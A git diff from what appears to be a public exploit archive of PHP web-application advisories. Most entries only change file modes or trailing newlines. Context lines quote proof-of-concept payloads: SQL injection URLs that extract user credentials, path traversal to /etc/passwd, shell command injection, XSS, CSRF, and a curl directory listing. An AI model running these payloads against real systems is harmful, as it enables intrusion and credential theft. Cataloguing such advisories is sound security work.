b/platforms/php/webapps/38965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38966.txt b/platforms/php/webapps/38966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38975.txt b/platforms/php/webapps/38975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38976.txt b/platforms/php/webapps/38976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38981.txt b/platforms/php/webapps/38981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38984.txt b/platforms/php/webapps/38984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38985.txt b/platforms/php/webapps/38985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38986.txt b/platforms/php/webapps/38986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38987.html b/platforms/php/webapps/38987.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38988.txt b/platforms/php/webapps/38988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38989.txt b/platforms/php/webapps/38989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38990.txt b/platforms/php/webapps/38990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38991.pl b/platforms/php/webapps/38991.pl index a14f0ccad..cddf3ea9b 100755 --- a/platforms/php/webapps/38991.pl +++ b/platforms/php/webapps/38991.pl @@ -82,5 +82,4 @@ sub usage() print " Bug Found by bd0rk \r\n"; print "============================================================================\r\n"; exit(); - } - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/php/webapps/3900.php b/platforms/php/webapps/3900.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3901.txt b/platforms/php/webapps/3901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39011.txt b/platforms/php/webapps/39011.txt old mode 100755 new mode 100644 index b63fcb55a..2506b233a --- a/platforms/php/webapps/39011.txt +++ b/platforms/php/webapps/39011.txt @@ -4,4 +4,4 @@ UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities be An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. -http://www.example.com/products.php?cat_id=4 \ No newline at end of file +http://www.example.com/products.php?cat_id=4 \ No newline at end of file diff --git a/platforms/php/webapps/39012.txt b/platforms/php/webapps/39012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39013.html b/platforms/php/webapps/39013.html old mode 100755 new mode 100644 index a0efe1981..5dcbcf891 --- a/platforms/php/webapps/39013.html +++ b/platforms/php/webapps/39013.html @@ -11,4 +11,4 @@ Exploiting the issue will allow a remote attacker to use a victim's currently ac <input type=â?hiddenâ? name=â?addnewâ? value=â?1?/> <input type=â?hiddenâ? name=â?actionâ? value=â?saveâ?/> <input type=â?hiddenâ? name=â?newâ? value=â?Submitâ?/> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/39014.txt b/platforms/php/webapps/39014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39015.txt b/platforms/php/webapps/39015.txt old mode 100755 new mode 100644 index e1b2f8fa4..582ae2af9 --- a/platforms/php/webapps/39015.txt +++ b/platforms/php/webapps/39015.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Atmail 7.1.3 is vulnerable; others versions may also be affected. - <iframe width=0 height=0 src="javascript:alert('xss in main body')"> \ No newline at end of file + <iframe width=0 height=0 src="javascript:alert('xss in main body')"> \ No newline at end of file diff --git a/platforms/php/webapps/39016.txt b/platforms/php/webapps/39016.txt old mode 100755 new mode 100644 index 09f203428..b9511ac49 --- a/platforms/php/webapps/39016.txt +++ b/platforms/php/webapps/39016.txt @@ -4,4 +4,4 @@ The Almond Classifieds Component for Joomla is prone to a vulnerability that let An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. -http://127.0.0.1/component/com_aclassfb/photos/ \ No newline at end of file +http://127.0.0.1/component/com_aclassfb/photos/ \ No newline at end of file diff --git a/platforms/php/webapps/39017.txt b/platforms/php/webapps/39017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3902.txt b/platforms/php/webapps/3902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39028.txt b/platforms/php/webapps/39028.txt old mode 100755 new mode 100644 index e2bbb1ff6..48b98b600 --- a/platforms/php/webapps/39028.txt +++ b/platforms/php/webapps/39028.txt @@ -8,4 +8,4 @@ Sexy polling 1.0.8 is vulnerable; other versions may also be affected. http://www.example.com/components/com_sexypolling/vote.php POST -answer_id[]=[SQL Injection] \ No newline at end of file +answer_id[]=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/39029.txt b/platforms/php/webapps/39029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3903.php b/platforms/php/webapps/3903.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39030.txt b/platforms/php/webapps/39030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39031.html b/platforms/php/webapps/39031.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39032.txt b/platforms/php/webapps/39032.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39034.html b/platforms/php/webapps/39034.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39038.txt b/platforms/php/webapps/39038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39057.txt b/platforms/php/webapps/39057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39058.txt b/platforms/php/webapps/39058.txt old mode 100755 new mode 100644 index 234518cb4..c51ed749b --- a/platforms/php/webapps/39058.txt +++ b/platforms/php/webapps/39058.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to upload arbitrary files to the affected co Imageview 6.x are vulnerable; other versions may also be affected. http://www.example.com/photos/upload.php -http://www.example.com/Galerie/upload.php \ No newline at end of file +http://www.example.com/Galerie/upload.php \ No newline at end of file diff --git a/platforms/php/webapps/39059.txt b/platforms/php/webapps/39059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3906.htm b/platforms/php/webapps/3906.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39060.txt b/platforms/php/webapps/39060.txt old mode 100755 new mode 100644 index 14d17eb07..da1d0f746 --- a/platforms/php/webapps/39060.txt +++ b/platforms/php/webapps/39060.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected. -http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI] \ No newline at end of file +http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI] \ No newline at end of file diff --git a/platforms/php/webapps/39062.txt b/platforms/php/webapps/39062.txt old mode 100755 new mode 100644 index 0b653738a..3a01480b9 --- a/platforms/php/webapps/39062.txt +++ b/platforms/php/webapps/39062.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access ZenPhoto 1.4.4 is vulnerable; other versions may also be affected. -http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection] \ No newline at end of file +http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/39063.txt b/platforms/php/webapps/39063.txt old mode 100755 new mode 100644 index 69c710c3c..be98d5989 --- a/platforms/php/webapps/39063.txt +++ b/platforms/php/webapps/39063.txt @@ -15,4 +15,4 @@ http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name Remote code-execution http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD] -http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD] \ No newline at end of file +http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD] \ No newline at end of file diff --git a/platforms/php/webapps/39064.txt b/platforms/php/webapps/39064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39065.txt b/platforms/php/webapps/39065.txt old mode 100755 new mode 100644 index 711820dc8..3c6e30227 --- a/platforms/php/webapps/39065.txt +++ b/platforms/php/webapps/39065.txt @@ -8,4 +8,4 @@ Eventum 2.3.4 is vulnerable; other versions may also be affected. Following example URI is available. -http://www.example.com/setup/index.php \ No newline at end of file +http://www.example.com/setup/index.php \ No newline at end of file diff --git a/platforms/php/webapps/39066.txt b/platforms/php/webapps/39066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39068.txt b/platforms/php/webapps/39068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3907.txt b/platforms/php/webapps/3907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39078.txt b/platforms/php/webapps/39078.txt old mode 100755 new mode 100644 index 8ec005779..cf43e7c81 --- a/platforms/php/webapps/39078.txt +++ b/platforms/php/webapps/39078.txt @@ -13,4 +13,4 @@ Web Video Streamer 1.0 is vulnerable; other versions may also be affected. http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059 http://www.example.com/webstreamer-master/index.php?dir=../../../ XSS: http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest -http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/39079.txt b/platforms/php/webapps/39079.txt old mode 100755 new mode 100644 index b321ac59d..dc438cf83 --- a/platforms/php/webapps/39079.txt +++ b/platforms/php/webapps/39079.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Atmail 7.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/[XSS] \ No newline at end of file +http://www.example.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3908.txt b/platforms/php/webapps/3908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39080.txt b/platforms/php/webapps/39080.txt old mode 100755 new mode 100644 index 60933cdde..70d9c8322 --- a/platforms/php/webapps/39080.txt +++ b/platforms/php/webapps/39080.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Atmail 7.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=[XSS] \ No newline at end of file +http://www.example.com/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/39081.txt b/platforms/php/webapps/39081.txt old mode 100755 new mode 100644 index fff7afbc9..78791a812 --- a/platforms/php/webapps/39081.txt +++ b/platforms/php/webapps/39081.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Atmail 7.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=[XSS] \ No newline at end of file +http://www.example.com/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/39083.txt b/platforms/php/webapps/39083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39084.txt b/platforms/php/webapps/39084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39085.txt b/platforms/php/webapps/39085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39086.txt b/platforms/php/webapps/39086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39087.txt b/platforms/php/webapps/39087.txt old mode 100755 new mode 100644 index 30b124c52..3de1df7fe --- a/platforms/php/webapps/39087.txt +++ b/platforms/php/webapps/39087.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to obtain potentially sensitive in Singapore 0.9.9b and 0.9.10 are vulnerable; other versions may also be vulnerable. -http://www.example.com/thumb.php?gallery=./00000000000-764&height=100&image=[File Upload] \ No newline at end of file +http://www.example.com/thumb.php?gallery=./00000000000-764&height=100&image=[File Upload] \ No newline at end of file diff --git a/platforms/php/webapps/39088.txt b/platforms/php/webapps/39088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3909.txt b/platforms/php/webapps/3909.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39090.php b/platforms/php/webapps/39090.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39093.txt b/platforms/php/webapps/39093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39094.txt b/platforms/php/webapps/39094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39096.txt b/platforms/php/webapps/39096.txt old mode 100755 new mode 100644 index 49b48ebc0..749c0acfc --- a/platforms/php/webapps/39096.txt +++ b/platforms/php/webapps/39096.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc i-doit Pro 1.2.4 and prior are vulnerable. -http://www.example.com/?objID=[SQL Injection] \ No newline at end of file +http://www.example.com/?objID=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/39098.txt b/platforms/php/webapps/39098.txt old mode 100755 new mode 100644 index cbfaec540..64e0ee1cf --- a/platforms/php/webapps/39098.txt +++ b/platforms/php/webapps/39098.txt @@ -4,4 +4,4 @@ Wire Immogest component for Joomla! is prone to an SQL-injection vulnerability b Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_wire_immogest&view=object&id=[SQL Injection] \ No newline at end of file +http://www.example.com/index.php?option=com_wire_immogest&view=object&id=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/39099.txt b/platforms/php/webapps/39099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39100.txt b/platforms/php/webapps/39100.txt old mode 100755 new mode 100644 index 5e5e5285e..64504b2bc --- a/platforms/php/webapps/39100.txt +++ b/platforms/php/webapps/39100.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to obtain sensitive information that NextGEN Gallery 2.0.0 is vulnerable; other versions may also be affected. -curl -i -d 'dir=/etc/' http://www.example.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php \ No newline at end of file +curl -i -d 'dir=/etc/' http://www.example.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php \ No newline at end of file diff --git a/platforms/php/webapps/39101.php b/platforms/php/webapps/39101.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39107.txt b/platforms/php/webapps/39107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39108.txt b/platforms/php/webapps/39108.txt old mode 100755 new mode 100644 index 564888807..3f9621f1e --- a/platforms/php/webapps/39108.txt +++ b/platforms/php/webapps/39108.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Versions prior to POSH 3.3.0 are vulnerable. http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item -%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23 \ No newline at end of file +%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23 \ No newline at end of file diff --git a/platforms/php/webapps/39109.txt b/platforms/php/webapps/39109.txt old mode 100755 new mode 100644 index adbc17de9..92fe96a33 --- a/platforms/php/webapps/39109.txt +++ b/platforms/php/webapps/39109.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Versions prior to Relevanssi 3.3 are vulnerable. -http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi \ No newline at end of file diff --git a/platforms/php/webapps/3911.txt b/platforms/php/webapps/3911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39110.txt b/platforms/php/webapps/39110.txt old mode 100755 new mode 100644 index 4d9683f87..21479f20a --- a/platforms/php/webapps/39110.txt +++ b/platforms/php/webapps/39110.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Cory Jobs Search 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection] \ No newline at end of file +http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/39111.php b/platforms/php/webapps/39111.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39113.txt b/platforms/php/webapps/39113.txt old mode 100755 new mode 100644 index dfa295ee9..97c184d68 --- a/platforms/php/webapps/39113.txt +++ b/platforms/php/webapps/39113.txt @@ -8,4 +8,4 @@ E-Store 1.0 and 2.0 are vulnerable; other versions may also be affected. http://www.example.com/page.php?id=[SQL Injection] -http://www.example.com/news.php?id=[SQL Injection] \ No newline at end of file +http://www.example.com/news.php?id=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/39116.txt b/platforms/php/webapps/39116.txt old mode 100755 new mode 100644 index b56fb6ee5..2d60da619 --- a/platforms/php/webapps/39116.txt +++ b/platforms/php/webapps/39116.txt @@ -4,4 +4,4 @@ GNUboard is prone to multiple SQL-injection vulnerabilities because it fails to A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/bbs/ajax.autosave.php?content=1&subject=1[SQLi] \ No newline at end of file +http://www.example.com/bbs/ajax.autosave.php?content=1&subject=1[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/39117.txt b/platforms/php/webapps/39117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39118.html b/platforms/php/webapps/39118.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39124.txt b/platforms/php/webapps/39124.txt old mode 100755 new mode 100644 index 716b8846d..a9c8d257c --- a/platforms/php/webapps/39124.txt +++ b/platforms/php/webapps/39124.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor MeiuPic 2.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/MeiuPic/?ctl=../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/MeiuPic/?ctl=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/39126.txt b/platforms/php/webapps/39126.txt old mode 100755 new mode 100644 index e499be5bb..5be0d406b --- a/platforms/php/webapps/39126.txt +++ b/platforms/php/webapps/39126.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to compromise the application, acc BIGACE Web CMS 2.7.5 is vulnerable; other versions may also be affected. -http://www.example.com/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI] \ No newline at end of file +http://www.example.com/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/39128.txt b/platforms/php/webapps/39128.txt old mode 100755 new mode 100644 index 4a55d0052..9e7c4fa32 --- a/platforms/php/webapps/39128.txt +++ b/platforms/php/webapps/39128.txt @@ -4,4 +4,4 @@ Jorjweb is prone to an SQL-injection vulnerability because it fails to sufficien A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/ajedrez47/Paginas/info_torneo.php?id=3852'[REMOTE SQL-INJECTION WEB VULNERABILITY!]-- \ No newline at end of file +http://www.example.com/ajedrez47/Paginas/info_torneo.php?id=3852'[REMOTE SQL-INJECTION WEB VULNERABILITY!]-- \ No newline at end of file diff --git a/platforms/php/webapps/39129.txt b/platforms/php/webapps/39129.txt old mode 100755 new mode 100644 index 7f84f421e..0d23fbdb4 --- a/platforms/php/webapps/39129.txt +++ b/platforms/php/webapps/39129.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue using directory-traversal strings to view fil qEngine 6.0.0 and 4.1.6 are vulnerable; other versions may also be affected. -http://www.example.com/qe6_0/admin/task.php?run=../../../../../../windows/win.ini \ No newline at end of file +http://www.example.com/qe6_0/admin/task.php?run=../../../../../../windows/win.ini \ No newline at end of file diff --git a/platforms/php/webapps/39133.php b/platforms/php/webapps/39133.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39135.php b/platforms/php/webapps/39135.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39136.txt b/platforms/php/webapps/39136.txt old mode 100755 new mode 100644 index 22ff890d1..ea4cba868 --- a/platforms/php/webapps/39136.txt +++ b/platforms/php/webapps/39136.txt @@ -6,4 +6,4 @@ An attacker can exploit the cross-site request forgery issue to perform unauthor Symphony version 2.3.1 and prior are vulnerable. -<img src="http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20"> \ No newline at end of file +<img src="http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20"> \ No newline at end of file diff --git a/platforms/php/webapps/39139.txt b/platforms/php/webapps/39139.txt old mode 100755 new mode 100644 index 07c3cab12..ba790445c --- a/platforms/php/webapps/39139.txt +++ b/platforms/php/webapps/39139.txt @@ -7,4 +7,4 @@ Attackers can leverage this issue to bypass security restrictions and perform un PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable &core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7 -&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290 \ No newline at end of file +&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290 \ No newline at end of file diff --git a/platforms/php/webapps/39140.txt b/platforms/php/webapps/39140.txt old mode 100755 new mode 100644 index 66fc4e02d..007f99bad --- a/platforms/php/webapps/39140.txt +++ b/platforms/php/webapps/39140.txt @@ -4,4 +4,4 @@ Inneradmission component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_inneradmission&id=1'a \ No newline at end of file +http://www.example.com/index.php?option=com_inneradmission&id=1'a \ No newline at end of file diff --git a/platforms/php/webapps/39141.txt b/platforms/php/webapps/39141.txt old mode 100755 new mode 100644 index 256289526..1e7373821 --- a/platforms/php/webapps/39141.txt +++ b/platforms/php/webapps/39141.txt @@ -4,4 +4,4 @@ eazyCMS is prone to an SQL-injection vulnerability because it fails to sufficien A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?tab=[SQLI] \ No newline at end of file +http://www.example.com/index.php?tab=[SQLI] \ No newline at end of file diff --git a/platforms/php/webapps/39146.txt b/platforms/php/webapps/39146.txt old mode 100755 new mode 100644 index fb216ac5d..f132b3575 --- a/platforms/php/webapps/39146.txt +++ b/platforms/php/webapps/39146.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Jigowatt PHP Event Calendar 2.16b is vulnerable; other versions may also be affected. -http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection] \ No newline at end of file +http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection] \ No newline at end of file diff --git a/platforms/php/webapps/3915.txt b/platforms/php/webapps/3915.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39150.txt b/platforms/php/webapps/39150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39153.txt b/platforms/php/webapps/39153.txt old mode 100755 new mode 100644 index 2c59f44b1..4f35e65c8 --- a/platforms/php/webapps/39153.txt +++ b/platforms/php/webapps/39153.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc iDevAffiliate 5.0 and prior are vulnerable. -http://www.example.com/idevaffiliate/idevads.php?id=6&ad=[SQLi] \ No newline at end of file +http://www.example.com/idevaffiliate/idevads.php?id=6&ad=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/39157.txt b/platforms/php/webapps/39157.txt old mode 100755 new mode 100644 index b5ea3a46c..41e45d1d9 --- a/platforms/php/webapps/39157.txt +++ b/platforms/php/webapps/39157.txt @@ -4,4 +4,4 @@ Puntopy is prone to an SQL-injection vulnerability because it fails to sufficien A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/novedad.php?id=[SQL Injection] \ No newline at end of file +http://www.example.com/novedad.php?id=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/39167.txt b/platforms/php/webapps/39167.txt old mode 100755 new mode 100644 index c0800f342..1b74ba21a --- a/platforms/php/webapps/39167.txt +++ b/platforms/php/webapps/39167.txt @@ -27,5 +27,4 @@ open link application/install.php a form will appear, first text field is for new admin username and second field is for new password of web application -proceed with installation and web application will setup with new attacker supplied admin username password - \ No newline at end of file +proceed with installation and web application will setup with new attacker supplied admin username password \ No newline at end of file diff --git a/platforms/php/webapps/39168.txt b/platforms/php/webapps/39168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39171.txt b/platforms/php/webapps/39171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39172.txt b/platforms/php/webapps/39172.txt old mode 100755 new mode 100644 index 536981627..14ea1a0fb --- a/platforms/php/webapps/39172.txt +++ b/platforms/php/webapps/39172.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to compromise the application, access or m PrestaShop 1.6.0 is vulnerable; other versions may also be affected. -http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection] \ No newline at end of file +http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection] \ No newline at end of file diff --git a/platforms/php/webapps/39173.txt b/platforms/php/webapps/39173.txt old mode 100755 new mode 100644 index eb74378e3..b72d28796 --- a/platforms/php/webapps/39173.txt +++ b/platforms/php/webapps/39173.txt @@ -4,4 +4,4 @@ Caldera is prone to multiple SQL-injection vulnerabilities because it fails to s Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin \ No newline at end of file +http://www.example.com/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin \ No newline at end of file diff --git a/platforms/php/webapps/39174.txt b/platforms/php/webapps/39174.txt old mode 100755 new mode 100644 index a4aec6ebe..97ef17e06 --- a/platforms/php/webapps/39174.txt +++ b/platforms/php/webapps/39174.txt @@ -4,4 +4,4 @@ Caldera is prone to multiple SQL-injection vulnerabilities because it fails to s Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0 \ No newline at end of file +http://www.example.com/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0 \ No newline at end of file diff --git a/platforms/php/webapps/39176.html b/platforms/php/webapps/39176.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39178.txt b/platforms/php/webapps/39178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39179.txt b/platforms/php/webapps/39179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3918.txt b/platforms/php/webapps/3918.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39188.txt b/platforms/php/webapps/39188.txt old mode 100755 new mode 100644 index c502e1ffc..54b006264 --- a/platforms/php/webapps/39188.txt +++ b/platforms/php/webapps/39188.txt @@ -6,4 +6,4 @@ An attacker can leverage this issue to compromise the application, access or mod Glossaire 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION] \ No newline at end of file 